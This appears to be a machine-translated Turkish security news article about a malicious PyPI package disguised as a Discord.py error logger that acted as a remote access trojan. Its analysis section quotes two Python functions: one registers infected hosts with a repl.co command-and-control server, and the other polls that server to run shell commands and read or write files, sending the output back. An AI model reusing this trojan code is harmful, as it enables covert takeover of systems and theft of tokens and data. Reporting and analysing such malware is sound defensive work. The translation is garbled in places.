Görünüşte masum bir Python paketi, anlaşmazlık geliştiricisi topluluğunu hedefleyen sofistike bir uzaktan erişim Truva (sıçan) olarak maskelendi.
21 Mart 2022’de, Python Paket Dizininde (PYPI) ‘Discord Py Hata Logger. ”
.webp)
Discord.py kütüphanesi ile çalışan geliştiriciler için kendisini yararlı bir hata ayıklama yardımcı programı olarak sunarken, paket, kurbanların sistemlerine arka kapı erişimini sağlamak için tasarlanmış kötü amaçlı kod içeriyordu.
.png
)
Paket, özellikle bu tür araçları kapsamlı güvenlik incelemesi olmadan kurabilen türden indie geliştiriciler, otomasyon mühendisleri veya küçük ekipler oluşturan veya korumayı geliştiren geliştiricileri özel olarak hedefledi.
Discord’un büyük ekosistemi, aylık 200 milyondan fazla aktif kullanıcısı ve% 25’inden fazlası üçüncü taraf uygulamalarla etkileşime girer, bu tür saldırılar için verimli bir zemin sağlar.
İpuçları ve kod snippet’lerinin sunucular ve doğrudan mesajlar aracılığıyla sıklıkla paylaşıldığı Discord’un geliştirici topluluğunun sosyal doğası, kötü niyetli paketlerin güvenilir kanallardan hızla yayılabileceği bir ortam yaratır.
Socket.Dev Push Araştırmacılar, paketin tamamen işlevsel bir uzaktan erişim Truva atı olarak çalıştığını ve meşru görünümlü bir cepheyi korurken gizli bir komut ve kontrol kanalı oluşturduğunu belirledi.
Araştırmacılar, ReadMe belgeleri veya ayrıntılı bir açıklama olmamasına rağmen, paketin 11.000’den fazla indirme biriktirmeyi başardığını ve binlerce geliştirici sistemini yetkisiz erişim ve veri açığa vurma riski altında yerleştirdiğini keşfetti.
Bu kötü amaçlı yazılımın etkisi, hemen sistem uzlaşmasının ötesine uzanır. Discord Bot geliştiricilerini hedefleyerek, saldırganlar Discord Bot tokenlerine, kullanıcı verilerine ve sunucu bilgilerine potansiyel erişim elde etti.
Enfekte sistemler, ağlardaki yanal hareket için veya Discord’un daha geniş kullanıcı tabanına karşı daha sofistike saldırılar için sahneleme gerekçesiyle kullanılabilir.
Enfeksiyon mekanizması ve komut yürütme
Kötü amaçlı yazılımın teknik analizi, kalıcı kontrolün sürdürülmesi için sofistike ve basit yaklaşımını ortaya koymaktadır. Kurulum üzerine, paket derhal backstabprotection.jamesx123.repl.co adresinde barındırılan bir saldırgan kontrollü komut ve kontrol (C2) sunucusu ile iletişim kurar.
Başlangıç bağlantı, enfekte olan ana bilgisayarı sessizce kaydeden bir Run () işleviyle yapılır:-
def run(value):
link = "https://backstabprotection.jamesx123.repl.co/"
try:
data = {'name': value}
req.post(link, data)
except:
pass
return valueKötü amaçlı yazılım işlevselliğinin çekirdeği, her saniye komutları kontrol eden sürekli bir yoklama döngüsünde bulunur.
Bu hata ayıklama () işlevi, keyfi kabuk komutlarının ve dosya manipülasyon işlemlerinin uzaktan yürütülmesini sağlar:-
def debug():
link = "https://backstabprotection.jamesx123.repl.co/"
while True:
try:
output = []
resp = req.get(link).text
if "readfile" in resp:
x = open(resp.split(" ")[1], "r")
contents = x.read()
output.append(contents. Encode("utf-8"))
elif "writefile" in resp:
x = open(resp.split(" ")[1], "w")
x.write(resp.split(" ")[2])
output.append(b"done")
else:
output = runcommand(resp)
for i in output:
req.post(link + "output", {'output': i.decode('utf-8')})
except:
pass
time.sleep(1)Kötü amaçlı yazılım tasarımı, gelen bağlantılar yerine giden HTTP yoklama yoluyla birçok güvenlik duvarı ve güvenlik izleme araçlarını atlamasına izin verir.
Bu gizli yaklaşım, onu daha az güvenli geliştirme ortamlarında özellikle etkili kılmaktadır.
Tanımlamanın ardından, kötü amaçlı paket PYPI’nin güvenlik ekibine bildirildi ve daha sonra kaldırıldı, ancak olay, giderek daha karmaşık hale gelen sosyal mühendislik saldırılarına karşı açık kaynak tedarik zincirlerinin güvence altına alınmasında devam eden zorlukları vurgulamaktadır.
Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.